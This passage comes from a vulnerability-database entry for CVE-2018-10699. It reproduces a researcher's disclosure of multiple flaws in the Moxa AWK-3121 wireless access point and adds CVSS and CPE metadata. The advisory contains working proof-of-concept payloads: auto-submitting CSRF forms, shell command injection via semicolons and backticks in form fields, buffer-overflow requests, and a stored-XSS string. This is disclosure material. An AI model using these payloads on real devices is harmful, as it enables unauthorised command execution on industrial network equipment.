to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0789",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "NVD",
"id": "CVE-2018-10699"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10699"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10699",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10699",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120484",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10699",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10699",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-327",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120484",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10699",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120484"
},
{
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter \"iw_privatePass\" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" 